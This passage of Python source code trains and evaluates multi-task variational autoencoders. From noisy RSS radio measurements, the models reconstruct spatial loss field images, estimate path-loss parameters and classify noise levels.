idx = (test_noise_class == 2)
else:
raise NotImplementedError('Noise level {} not understood.'.format(noise_level))
test_noise_class = test_noise_class[idx]
# normalized noisy RSS measurement input (shape: [num_sample, NxPxP])
test_input_RSS = testing_data['RSS'][idx]
test_input_RSS = (test_input_RSS - RSS_min) / (RSS_max - RSS_min)
test_input_RSS = test_input_RSS.reshape(-1, self.args.N, self.args.P, self.args.P)
# normalized clean RSS measurement input (as target for decoder) (shape: [num_sample, NxPxP])
test_denoise_RSS = testing_data['RSS_denoise'][idx]
test_denoise_RSS = (test_denoise_RSS - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
test_denoise_RSS = test_denoise_RSS.reshape(-1, self.args.N, self.args.P, self.args.P)
# SLF image (shape: [1, K[0]*K[1]])
test_slf_img = testing_data['slf_img'][idx]
test_slf_img = test_slf_img.reshape(-1, self.args.K0 * self.args.K1)
# b: bias. alpha: path loss exponent. ab_norm: [b_norm, alpha_norm] (shape: [num_sample, N+1])
test_ab = testing_data['ab_norm'][idx]
test_input_RSS = torch.from_numpy(test_input_RSS).float()
test_denoise_RSS = torch.from_numpy(test_denoise_RSS).float()
test_slf_img = torch.from_numpy(test_slf_img).float()
test_ab = torch.from_numpy(test_ab).float()
test_noise_class = torch.from_numpy(test_noise_class).long()
Test_Dataset = TensorDataset(test_input_RSS, test_denoise_RSS, test_slf_img, test_ab, test_noise_class)
return Test_Dataset
def load_testing_img1(self, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level='all'):
# Load testing data for image 1
testing_data1 = sio.loadmat('./data/testing_data_image1.mat')
# normalized noisy RSS measurement input (shape: [num_sample, NxPxP])
test_input_RSS1 = testing_data1['RSS']
test_input_RSS1 = (test_input_RSS1 - RSS_min) / (RSS_max - RSS_min)
test_input_RSS1 = test_input_RSS1.reshape(-1, self.args.N, self.args.P, self.args.P)
# normalized clean RSS measurement input (as target for decoder) (shape: [num_sample, NxPxP])
test_denoise_RSS1 = testing_data1['RSS_denoise']
test_denoise_RSS1 = (test_denoise_RSS1 - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
test_denoise_RSS1 = test_denoise_RSS1.reshape(-1, self.args.N, self.args.P, self.args.P)
# SLF image (shape: [1, K[0]*K[1]])
test_slf_img1 = testing_data1['slf_img']
test_slf_img1 = test_slf_img1.reshape(1, self.args.K0 * self.args.K1)
# SLF image (shape: [num_sample, K[0]*K[1]])
test_slf_img1 = np.tile(test_slf_img1, (test_input_RSS1.shape[0], 1))
# b: bias. alpha: path loss exponent. ab_norm: [b_norm, alpha_norm] (shape: [num_sample, N+1])
test_ab1 = testing_data1['ab_norm']
# noise level classes (shape: [num_sample, 1]) (classes: 0, 1, 2)
test_noise_level1 = testing_data1['sig_epsilon_class']
test_noise_level1 = np.squeeze(test_noise_level1)
if noise_level == 'all':
pass
elif noise_level == 'low':
test_input_RSS1 = test_input_RSS1[:500]
test_denoise_RSS1 = test_denoise_RSS1[:500]
test_slf_img1 = test_slf_img1[:500]
test_ab1 = test_ab1[:500]
test_noise_level1 = test_noise_level1[:500]
elif noise_level == 'mid':
test_input_RSS1 = test_input_RSS1[500:1000]
test_denoise_RSS1 = test_denoise_RSS1[500:1000]
test_slf_img1 = test_slf_img1[500:1000]
test_ab1 = test_ab1[500:1000]
test_noise_level1 = test_noise_level1[500:1000]
elif noise_level == 'high':
test_input_RSS1 = test_input_RSS1[1000:]
test_denoise_RSS1 = test_denoise_RSS1[1000:]
test_slf_img1 = test_slf_img1[1000:]
test_ab1 = test_ab1[1000:]
test_noise_level1 = test_noise_level1[1000:]
else:
raise NotImplementedError('Noise level {} not understood.'.format(noise_level))
test_input_RSS1 = torch.from_numpy(test_input_RSS1).float()
test_denoise_RSS1 = torch.from_numpy(test_denoise_RSS1).float()
test_slf_img1 = torch.from_numpy(test_slf_img1).float()
test_ab1 = torch.from_numpy(test_ab1).float()
test_noise_level1 = torch.from_numpy(test_noise_level1).long()
Test_Dataset_1 = TensorDataset(test_input_RSS1, test_denoise_RSS1, test_slf_img1, test_ab1, test_noise_level1)
return Test_Dataset_1
def load_testing_img2(self, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level='all'):
# Load testing data for image 2
testing_data2 = sio.loadmat('./data/testing_data_image2.mat')
# normalized noisy RSS measurement input (shape: [num_sample, NxPxP])
test_input_RSS2 = testing_data2['RSS']
test_input_RSS2 = (test_input_RSS2 - RSS_min) / (RSS_max - RSS_min)
test_input_RSS2 = test_input_RSS2.reshape(-1, self.args.N, self.args.P, self.args.P)
# normalized clean RSS measurement input (as target for decoder) (shape: [num_sample, NxPxP])
test_denoise_RSS2 = testing_data2['RSS_denoise_norm']
test_denoise_RSS2 = (test_denoise_RSS2 - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
test_denoise_RSS2 = test_denoise_RSS2.reshape(-1, self.args.N, self.args.P, self.args.P)
# SLF image (shape: [1, K[0]*K[1]])
test_slf_img2 = testing_data2['slf_img']
test_slf_img2 = test_slf_img2.reshape(1, self.args.K0 * self.args.K1)
# SLF image (shape: [num_sample, K[0]*K[1]])
test_slf_img2 = np.tile(test_slf_img2, (test_input_RSS2.shape[0], 1))
# b: bias. alpha: path loss exponent. ab_norm: [b_norm, alpha_norm] (shape: [num_sample, N+1])
test_ab2 = testing_data2['ab_norm']
# noise level classes (shape: [num_sample, 1]) (classes: 0, 1, 2)
test_noise_level2 = testing_data2['sig_epsilon_class']
test_noise_level2 = np.squeeze(test_noise_level2)
if noise_level == 'all':
pass
elif noise_level == 'low':
test_input_RSS2 = test_input_RSS2[:500]
test_denoise_RSS2 = test_denoise_RSS2[:500]
test_slf_img2 = test_slf_img2[:500]
test_ab2 = test_ab2[:500]
test_noise_level2 = test_noise_level2[:500]
elif noise_level == 'mid':
test_input_RSS2 = test_input_RSS2[500:1000]
test_denoise_RSS2 = test_denoise_RSS2[500:1000]
test_slf_img2 = test_slf_img2[500:1000]
test_ab2 = test_ab2[500:1000]
test_noise_level2 = test_noise_level2[500:1000]
elif noise_level == 'high':
test_input_RSS2 = test_input_RSS2[1000:]
test_denoise_RSS2 = test_denoise_RSS2[1000:]
test_slf_img2 = test_slf_img2[1000:]
test_ab2 = test_ab2[1000:]
test_noise_level2 = test_noise_level2[1000:]
else:
raise NotImplementedError('Noise level {} not understood.'.format(noise_level))
test_input_RSS2 = torch.from_numpy(test_input_RSS2).float()
test_denoise_RSS2 = torch.from_numpy(test_denoise_RSS2).float()
test_slf_img2 = torch.from_numpy(test_slf_img2).float()
test_ab2 = torch.from_numpy(test_ab2).float()
test_noise_level2 = torch.from_numpy(test_noise_level2).long()
Test_Dataset_2 = TensorDataset(test_input_RSS2, test_denoise_RSS2, test_slf_img2, test_ab2, test_noise_level2)
return Test_Dataset_2
def train(self, model, train_loader, optimizer, epoch):
model.train()
train_loss = 0 # total loss
train_kld = 0 # kl-divergence
train_loss_task0 = 0 # loss for reconstruct RSS
train_loss_task1 = 0 # loss for SLF image estimation
train_loss_task2 = 0 # loss for parameters estimation
train_loss_task3 = 0 # loss for noise level prediction
train_acc = 0 # accuracy for noise level prediction
batch_num = int(len(train_loader.dataset) / self.args.batch_size) + 1
batch_10num = batch_num * 10
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(train_loader):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
optimizer.zero_grad()
KLD, RSS, SLF, ab, noise_level = model(input_RSS)
loss_task0 = F.binary_cross_entropy(RSS, target_RSS, reduction='sum')/(self.args.N * self.args.P * self.args.P)
loss_task1 = F.binary_cross_entropy(SLF, target_SLF, reduction='sum')/(self.args.K0 * self.args.K1)
loss_task2 = F.binary_cross_entropy(ab, target_ab, reduction='sum')/(self.args.N + 1)
loss_task3 = F.cross_entropy(noise_level, target_noise_level, reduction='sum')
loss_weight0 = (((epoch-1) % 20) * batch_num + batch_idx) / batch_10num
loss_weight0 = np.minimum(loss_weight0, self.args.lambda0)
loss = loss_weight0 * KLD + self.args.lambda1 * loss_task0 + self.args.lambda2 * loss_task1\
+ self.args.lambda3 * loss_task2 + self.args.lambda4 * loss_task3
train_loss += loss.item()
train_kld += KLD.item()
train_loss_task0 += loss_task0.item()
train_loss_task1 += loss_task1.item()
train_loss_task2 += loss_task2.item()
train_loss_task3 += loss_task3.item()
_, noise_pred = torch.max(noise_level, 1)
acc_task3 = (noise_pred == target_noise_level).sum()
train_acc += acc_task3.item()
loss /= input_RSS.size(0)
loss.backward()
optimizer.step()
if batch_idx % self.args.log_interval == 0:
print(
'Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}\tKLD: {:.6f}\tLoss0: {:.6f}\tLoss1: {:.6f}\tLoss2: {:.6f}\tLoss3: {:.6f}\tAcc: {:.6f}'.format(
epoch, batch_idx * len(input_RSS), len(train_loader.dataset),
100. * batch_idx / len(train_loader),
loss.item(),
KLD.item() / len(input_RSS),
loss_task0.item() / len(input_RSS), loss_task1.item() / len(input_RSS),
loss_task2.item() / len(input_RSS), loss_task3.item() / len(input_RSS), acc_task3.item() / len(input_RSS)))
train_loss /= len(train_loader.dataset)
train_kld /= len(train_loader.dataset)
train_loss_task0 /= len(train_loader.dataset)
train_loss_task1 /= len(train_loader.dataset)
train_loss_task2 /= len(train_loader.dataset)
train_loss_task3 /= len(train_loader.dataset)
train_acc /= len(train_loader.dataset)
print('====> Epoch: {} Average loss: {:.6f}'.format(epoch, train_loss))
print('====> KL divergence: {:.6f}'.format(train_kld))
print('====> RSS loss: {:.6f}'.format(train_loss_task0))
print('====> SLF loss: {:.6f}'.format(train_loss_task1))
print('====> ab loss: {:.6f}'.format(train_loss_task2))
print('====> noise level loss: {:.6f}'.format(train_loss_task3))
print('====> noise level Accuracy: {:.4f}'.format(train_acc))
return train_loss, train_kld, train_loss_task0, train_loss_task1, train_loss_task2, train_loss_task3, train_acc
def validate(self, model, val_loader, epoch):
model.eval()
val_loss = 0 # total loss
val_rmse_slf = 0 # slf reconstruction loss
val_mae_slf = 0 # slf reconstruction loss
batch_num = int(len(val_loader.dataset) / self.args.batch_size) + 1
batch_10num = batch_num * 10
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(val_loader):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
KLD, RSS, SLF, ab, noise_level = model(input_RSS)
loss_task0 = F.binary_cross_entropy(RSS, target_RSS, reduction='sum')/(self.args.N * self.args.P * self.args.P)
loss_task1 = F.binary_cross_entropy(SLF, target_SLF, reduction='sum')/(self.args.K0 * self.args.K1)
loss_task2 = F.binary_cross_entropy(ab, target_ab, reduction='sum')/(self.args.N + 1)
loss_task3 = F.cross_entropy(noise_level, target_noise_level, reduction='sum')
loss_weight0 = (((epoch - 1) % 20) * batch_num + batch_idx) / batch_10num
loss_weight0 = np.minimum(loss_weight0, self.args.lambda0)
loss = 0 * KLD + self.args.lambda1 * loss_task0 + self.args.lambda2 * loss_task1 \
+ self.args.lambda3 * loss_task2 + self.args.lambda4 * loss_task3
val_loss += loss.item()
slf_mse = F.mse_loss(SLF, target_SLF, reduction='sum') / (self.args.K0 * self.args.K1)
slf_mae = F.l1_loss(SLF, target_SLF, reduction='sum') / (self.args.K0 * self.args.K1)
val_rmse_slf += slf_mse.item()
val_mae_slf += slf_mae.item()
val_loss /= len(val_loader.dataset)
val_rmse_slf /= len(val_loader.dataset)
val_rmse_slf = np.sqrt(val_rmse_slf)
val_mae_slf /= len(val_loader.dataset)
print('====> Validation set loss: {:.6f}'.format(val_loss))
print('====> Validation set SLF rmse: {:.6f}'.format(val_rmse_slf))
print('====> Validation set SLF mae: {:.6f}'.format(val_mae_slf))
return val_loss, val_rmse_slf, val_mae_slf
def test(self, model, test_loader, epoch):
model.eval()
test_loss = 0 # total loss
test_kld = 0 # KL-divergence
test_loss_task0 = 0 # loss for reconstruct RSS
test_loss_task1 = 0 # loss for SLF image estimation
test_loss_task2 = 0 # loss for parameters estimation
test_loss_task3 = 0 # loss for noise level prediction
batch_num = int(len(test_loader.dataset) / self.args.batch_size) + 1
batch_10num = batch_num * 10
with torch.no_grad():
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(test_loader):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
KLD, RSS, SLF, ab, noise_level = model(input_RSS)
loss_task0 = F.binary_cross_entropy(RSS, target_RSS, reduction='sum') / (
self.args.N * self.args.P * self.args.P)
loss_task1 = F.binary_cross_entropy(SLF, target_SLF, reduction='sum') / (self.args.K0 * self.args.K1)
loss_task2 = F.binary_cross_entropy(ab, target_ab, reduction='sum') / (self.args.N + 1)
loss_task3 = F.cross_entropy(noise_level, target_noise_level, reduction='sum')
loss_weight0 = (((epoch - 1) % 20) * batch_num + batch_idx) / batch_10num
loss_weight0 = np.minimum(loss_weight0, self.args.lambda0)
loss = loss_weight0 * KLD + self.args.lambda1 * loss_task0 + self.args.lambda2 * loss_task1 \
+ self.args.lambda3 * loss_task2 + self.args.lambda4 * loss_task3
test_loss += loss.item()
test_kld += KLD.item()
test_loss_task0 += loss_task0.item()
test_loss_task1 += loss_task1.item()
test_loss_task2 += loss_task2.item()
test_loss_task3 += loss_task3.item()
test_loss /= len(test_loader.dataset)
test_kld /= len(test_loader.dataset)
test_loss_task0 /= len(test_loader.dataset)
test_loss_task1 /= len(test_loader.dataset)
test_loss_task2 /= len(test_loader.dataset)
test_loss_task3 /= len(test_loader.dataset)
test_acc = self.test_accuracy(model, test_loader)
print('====> Test set loss: {:.6f}'.format(test_loss))
print('====> Test set KL divergence: {:.6f}'.format(test_kld))
print('====> Test set RSS loss: {:.6f}'.format(test_loss_task0))
print('====> Test set SLF loss: {:.6f}'.format(test_loss_task1))
print('====> Test set ab loss: {:.6f}'.format(test_loss_task2))
print('====> Test set noise level loss: {:.6f}'.format(test_loss_task3))
print('====> Test set noise level Accuracy: {:.4f}'.format(test_acc))
return test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc
def train_save(self):
model = MGVAE(M=self.args.M, P=self.args.P, K=(self.args.K0, self.args.K1))
def weights_init(m):
if isinstance(m, torch.nn.Linear) or isinstance(m, torch.nn.Conv2d) or isinstance(m, torch.nn.ConvTranspose2d):
torch.nn.init.xavier_uniform_(m.weight.data)
if m.bias is not None:
torch.nn.init.zeros_(m.bias.data)
model.apply(weights_init)
model = model.to(self.device)
summary(model, input_size=(self.args.batch_size, self.args.N, self.args.P, self.args.P))
train_loader, val_loader, test_loader, test_loader1, test_loader2 = self.load_data()
optimizer = self.get_optimizer(model.parameters())
scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min', factor=0.25, patience=10, min_lr=1e-5)
train_set = []
val_set = []
test_set = [] # for test set
test_set1 = [] # for test image 1
test_set2 = [] # for test image 2
train_loss_path = self.path + 'train_loss_' + str(self.args.n_epochs) + '.npy'
val_loss_path = self.path + 'val_loss_' + str(self.args.n_epochs) + '.npy'
test_loss_path = self.path + 'test_loss_' + str(self.args.n_epochs) + '.npz'
model_path = self.path + 'model_' + str(self.args.n_epochs) + '.pth'
current_val_slf_loss = np.inf
for epoch in range(1, self.args.n_epochs+1):
print("Epoch %d learning rate:%f" % (epoch, optimizer.param_groups[0]['lr']))
train_loss, train_kld, train_loss_task0, train_loss_task1, train_loss_task2, train_loss_task3, train_acc = self.train(model,
train_loader,
optimizer,
epoch)
train_set.append([train_loss, train_kld, train_loss_task0, train_loss_task1, train_loss_task2, train_loss_task3, train_acc])
print('====> Validation Loss for Epoch {:d}'.format(epoch))
val_loss, val_slf_rmse, val_slf_mae = self.validate(model, val_loader, epoch)
val_set.append([val_loss, val_slf_rmse, val_slf_mae])
scheduler.step(val_loss)
print('====> Test for Epoch {:d}'.format(epoch))
test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc = self.test(
model,
test_loader, epoch)
test_set.append(
[test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc])
print('====> Test Image1 for Epoch {:d}'.format(epoch))
test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc = self.test(model,
test_loader1, epoch)
test_set1.append([test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc])
print('====> Test Image2 for Epoch {:d}'.format(epoch))
test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc = self.test(model,
test_loader2, epoch)
test_set2.append([test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc])
if epoch % self.args.save_freq == 0:
ckpt_path = self.path + '/model' + '_' + str(epoch) + '.pth'
torch.save(model.state_dict(), ckpt_path)
print('checkpoint{}.pth saved!'.format(epoch))
if val_slf_mae < current_val_slf_loss:
torch.save(model.state_dict(), model_path)
current_val_slf_loss = val_slf_mae
train_loss = np.asarray(train_set).reshape(-1, 7)
val_loss = np.asarray(val_set).reshape(-1, 3)
test_loss = np.asarray(test_set).reshape(-1, 7)
test_loss1 = np.asarray(test_set1).reshape(-1, 7)
test_loss2 = np.asarray(test_set2).reshape(-1, 7)
np.save(train_loss_path, train_loss)
np.save(val_loss_path, val_loss)
np.savez(test_loss_path, test_loss=test_loss, test_loss1=test_loss1, test_loss2=test_loss2)
def test_accuracy(self, model, test_loader):
model.eval()
acc = 0
for i, (input_RSS, *_, target_noise_level) in enumerate(test_loader):
input_RSS = input_RSS.to(self.device)
*_, noise_pred = model(input_RSS) # noise_pred: [batch_size, 3]
noise_pred = noise_pred.detach().cpu().numpy()
noise_pred = np.argmax(noise_pred, axis=1)
labels = target_noise_level.detach().cpu().numpy()
acc += np.sum((noise_pred == labels).astype(int))
acc /= len(test_loader.dataset)
return acc
def test_model(self, noise_level='all'):
model = MGVAE(M=self.args.M, P=self.args.P, K=(self.args.K0, self.args.K1))
model = model.to(self.device)
model_path = self.path + 'model_' + str(self.args.n_epochs) + '.pth'
model.load_state_dict(torch.load(model_path, map_location=self.device))
model.eval()
*_, test_loader, test_loader1, test_loader2 = self.load_data(noise_level)
noise_class = 0 # noise_class = 0 stands for all noise classes
if noise_level == 'low':
noise_class = 1
elif noise_level == 'mid':
noise_class = 2
elif noise_level == 'high':
noise_class = 3
# test model for testing set
slf_rmse = 0
slf_mae = 0
ab_rmse = 0
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(
test_loader):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
KLD, RSS, SLF, ab, noise_pred = model(input_RSS)
# plot SLF reconstruction image for image1
n = min(target_RSS.size(0), 8)
comparison = torch.cat([target_SLF.view(target_RSS.size(0), 1, self.args.K0, self.args.K1)[:n],
SLF.view(SLF.size(0), 1, self.args.K0, self.args.K1)[:n]])
save_image(comparison.cpu(),
self.path + 'reconstruction_SLF_noise' + str(noise_class) + '_' + str(batch_idx) + '.png',
nrow=n)
# test SLF image RMSE
slf_rmse += F.mse_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# test SLF image MAE
slf_mae += F.l1_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# test ab parameters RMSE
ab_rmse += F.mse_loss(ab, target_ab, reduction='sum').item() / (self.args.N + 1)
slf_rmse /= len(test_loader.dataset)
slf_rmse = np.sqrt(slf_rmse)
slf_mae /= len(test_loader.dataset)
ab_rmse /= len(test_loader.dataset)
ab_rmse = np.sqrt(ab_rmse)
noise_acc = self.test_accuracy(model, test_loader)
print('====> Test for Testing Set:')
print('====> Noise_level: ' + noise_level)
print('====> Test set SLF rmse: {:.6f}'.format(slf_rmse))
print('====> Test set SLF mae: {:.6f}'.format(slf_mae))
print('====> Test set ab rmse: {:.6f}'.format(ab_rmse))
print('====> Test set noise level Accuracy: {:.4f}'.format(noise_acc))
# test model for image 1
slf_rmse = 0
slf_mae = 0
ab_rmse = 0
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(test_loader1):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
KLD, RSS, SLF, ab, noise_pred = model(input_RSS)
# plot SLF reconstruction image for image1
n = min(target_RSS.size(0), 8)
comparison = torch.cat([target_SLF.view(target_RSS.size(0), 1, self.args.K0, self.args.K1)[:n],
SLF.view(SLF.size(0), 1, self.args.K0, self.args.K1)[:n]])
save_image(comparison.cpu(),
self.path + 'reconstruction_SLF1_noise' + str(noise_class) + '_' + str(batch_idx) + '.png',
nrow=n)
# test SLF image RMSE
slf_rmse += F.mse_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# test SLF image MAE
slf_mae += F.l1_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# test ab parameters RMSE
ab_rmse += F.mse_loss(ab, target_ab, reduction='sum').item() / (self.args.N + 1)
slf_rmse /= len(test_loader1.dataset)
slf_rmse = np.sqrt(slf_rmse)
slf_mae /= len(test_loader1.dataset)
ab_rmse /= len(test_loader1.dataset)
ab_rmse = np.sqrt(ab_rmse)
noise_acc = self.test_accuracy(model, test_loader1)
print('====> Test for image 1:')
print('====> Noise_level: ' + noise_level)
print('====> Test set SLF rmse: {:.6f}'.format(slf_rmse))
print('====> Test set SLF mae: {:.6f}'.format(slf_mae))
print('====> Test set ab rmse: {:.6f}'.format(ab_rmse))
print('====> Test set noise level Accuracy: {:.4f}'.format(noise_acc))
# test model for image 2
slf_rmse = 0
slf_mae = 0
ab_rmse = 0
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(test_loader2):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
KLD, RSS, SLF, ab, noise_pred = model(input_RSS)
# plot SLF reconstruction image for image1
n = min(target_RSS.size(0), 8)
comparison = torch.cat([target_SLF.view(target_RSS.size(0), 1, self.args.K0, self.args.K1)[:n],
SLF.view(SLF.size(0), 1, self.args.K0, self.args.K1)[:n]])
save_image(comparison.cpu(),
self.path + 'reconstruction_SLF2_noise' + str(noise_class) + '_' + str(batch_idx) + '.png',
nrow=n)
# test SLF image RMSE
slf_rmse += F.mse_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# test SLF image MAE
slf_mae += F.l1_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# test ab parameters RMSE
ab_rmse += F.mse_loss(ab, target_ab, reduction='sum').item() / (self.args.N + 1)
slf_rmse /= len(test_loader2.dataset)
slf_rmse = np.sqrt(slf_rmse)
slf_mae /= len(test_loader2.dataset)
ab_rmse /= len(test_loader2.dataset)
ab_rmse = np.sqrt(ab_rmse)
noise_acc = self.test_accuracy(model, test_loader2)
print('====> Test for image 2:')
print('====> Noise_level: ' + noise_level)
print('====> Test set SLF rmse: {:.6f}'.format(slf_rmse))
print('====> Test set SLF mae: {:.6f}'.format(slf_mae))
print('====> Test set ab rmse: {:.6f}'.format(ab_rmse))
print('====> Test set noise level Accuracy: {:.4f}'.format(noise_acc))
# runner for Multi-task Laplacian VAE
class MLVAE_runner():
def __init__(self, args):
self.args = args
cuda_flag = not self.args.no_cuda and torch.cuda.is_available()
self.device = torch.device("cuda" if cuda_flag else "cpu")
torch.manual_seed(self.args.seed)
random.seed(self.args.seed)
self.path = self.args.run + 'MLVAE/'
if not os.path.exists(self.path):
os.makedirs(self.path)
def get_optimizer(self, parameters):
if self.args.optimizer == 'Adam':
return optim.Adam(parameters, lr=self.args.lr, weight_decay=self.args.weight_decay, betas=(0.9, 0.999), eps=1e-7)
elif self.args.optimizer == 'RMSProp':
return optim.RMSprop(parameters, lr=self.args.lr, weight_decay=self.args.weight_decay)
elif self.args.optimizer == 'SGD':
return optim.SGD(parameters, lr=self.args.lr, momentum=0.9)
else:
raise NotImplementedError('Optimizer {} not understood.'.format(self.args.optimizer))
def load_data(self, noise_level='all'):
dataset, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min = self.load_training_data()
train_size = int(len(dataset) * 0.9)
val_size = int(len(dataset) * 0.1)
dataset_train, dataset_val = random_split(dataset, [train_size, val_size],
generator=torch.Generator().manual_seed(self.args.seed))
dataset_test = self.load_testing_data(RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level)
dataset_test1 = self.load_testing_img1(RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level)
dataset_test2 = self.load_testing_img2(RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level)
train_loader = DataLoader(
dataset_train,
batch_size=self.args.batch_size, shuffle=True, num_workers=2)
val_loader = DataLoader(
dataset_val,
batch_size=self.args.batch_size, shuffle=True, num_workers=2)
test_loader = DataLoader(
dataset_test,
batch_size=self.args.batch_size, shuffle=False, num_workers=2)
test_loader1 = DataLoader(
dataset_test1,
batch_size=self.args.batch_size, shuffle=False, num_workers=2)
test_loader2 = DataLoader(
dataset_test2,
batch_size=self.args.batch_size, shuffle=False, num_workers=2)
print("Data Loaded!")
return train_loader, val_loader, test_loader, test_loader1, test_loader2
def load_training_data(self):
# Load training data
training_data = sio.loadmat('./data/training_data.mat')
# normalized noisy RSS measurement input (shape: [num_sample, NxPxP])
train_input_RSS = training_data['RSS']
RSS_max = np.amax(train_input_RSS, axis=0, keepdims=True)
RSS_min = np.amin(train_input_RSS, axis=0, keepdims=True)
train_input_RSS = (train_input_RSS - RSS_min) / (RSS_max - RSS_min)
train_input_RSS = train_input_RSS.reshape(-1, self.args.N, self.args.P, self.args.P)
# normalized clean RSS measurement input (as target for decoder) (shape: [num_sample, NxPxP])
train_denoise_RSS = training_data['RSS_denoise']
RSS_denoise_max = np.amax(train_denoise_RSS, axis=0, keepdims=True)
RSS_denoise_min = np.amin(train_denoise_RSS, axis=0, keepdims=True)
train_denoise_RSS = (train_denoise_RSS - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
train_denoise_RSS = train_denoise_RSS.reshape(-1, self.args.N, self.args.P, self.args.P)
# SLF image (shape: [num_sample, K[0]*K[1]])
train_slf_img = training_data['slf_img']
train_slf_img = train_slf_img.reshape(-1, self.args.K0 * self.args.K1)
# b: bias. alpha: path loss exponent. ab_norm: [b_norm, alpha_norm] (shape: [num_sample, N+1])
train_ab = training_data['ab_norm']
# noise level classes (shape: [num_sample, 1]) (classes: 0, 1, 2)
train_noise_level = training_data['sig_epsilon_class']
train_noise_level = np.squeeze(train_noise_level)
train_input_RSS = torch.from_numpy(train_input_RSS).float()
train_denoise_RSS = torch.from_numpy(train_denoise_RSS).float()
train_slf_img = torch.from_numpy(train_slf_img).float()
train_ab = torch.from_numpy(train_ab).float()
train_noise_level = torch.from_numpy(train_noise_level).long()
Train_Dataset = TensorDataset(train_input_RSS, train_denoise_RSS, train_slf_img, train_ab, train_noise_level)
return Train_Dataset, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min
def load_testing_data(self, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level='all'):
# Load testing data
testing_data = sio.loadmat('./data/testing_data.mat')
# noise level classes (shape: [num_sample, 1]) (classes: 0, 1, 2)
test_noise_class = testing_data['sig_epsilon_class']
test_noise_class = np.squeeze(test_noise_class)
idx = (test_noise_class == 0) | (test_noise_class == 1) | (test_noise_class == 2)
if noise_level == 'all':
pass
elif noise_level == 'low':
idx = (test_noise_class == 0)
elif noise_level == 'mid':
idx = (test_noise_class == 1)
elif noise_level == 'high':
idx = (test_noise_class == 2)
else:
raise NotImplementedError('Noise level {} not understood.'.format(noise_level))
test_noise_class = test_noise_class[idx]
# normalized noisy RSS measurement input (shape: [num_sample, NxPxP])
test_input_RSS = testing_data['RSS'][idx]
test_input_RSS = (test_input_RSS - RSS_min) / (RSS_max - RSS_min)
test_input_RSS = test_input_RSS.reshape(-1, self.args.N, self.args.P, self.args.P)
# normalized clean RSS measurement input (as target for decoder) (shape: [num_sample, NxPxP])
test_denoise_RSS = testing_data['RSS_denoise'][idx]
test_denoise_RSS = (test_denoise_RSS - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
test_denoise_RSS = test_denoise_RSS.reshape(-1, self.args.N, self.args.P, self.args.P)
# SLF image (shape: [1, K[0]*K[1]])
test_slf_img = testing_data['slf_img'][idx]
test_slf_img = test_slf_img.reshape(-1, self.args.K0 * self.args.K1)
# b: bias. alpha: path loss exponent. ab_norm: [b_norm, alpha_norm] (shape: [num_sample, N+1])
test_ab = testing_data['ab_norm'][idx]
test_input_RSS = torch.from_numpy(test_input_RSS).float()
test_denoise_RSS = torch.from_numpy(test_denoise_RSS).float()
test_slf_img = torch.from_numpy(test_slf_img).float()
test_ab = torch.from_numpy(test_ab).float()
test_noise_class = torch.from_numpy(test_noise_class).long()
Test_Dataset = TensorDataset(test_input_RSS, test_denoise_RSS, test_slf_img, test_ab, test_noise_class)
return Test_Dataset
